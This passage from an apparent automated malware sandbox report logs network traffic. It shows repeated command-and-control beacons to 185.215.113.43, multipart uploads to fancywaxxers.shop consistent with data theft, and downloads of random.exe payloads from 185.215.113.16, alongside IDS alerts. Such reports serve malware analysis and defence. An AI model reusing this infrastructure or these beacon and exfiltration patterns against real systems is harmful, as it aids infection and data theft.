00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                        Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                        Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49717 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49742 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49725 -> 104.21.112.1:443
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: fancywaxxers.shop
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OCZ4PL09TZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12811Host: fancywaxxers.shop
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YKZLOSC2307EF33User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15087Host: fancywaxxers.shop
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GN9DL9BSTQOO2N2JQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19957Host: fancywaxxers.shop
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3Z6B9YVZ08KHLTIK9OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: fancywaxxers.shop
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=10I2JPD0IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572170Host: fancywaxxers.shop
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: fancywaxxers.shop
                        Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                        Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
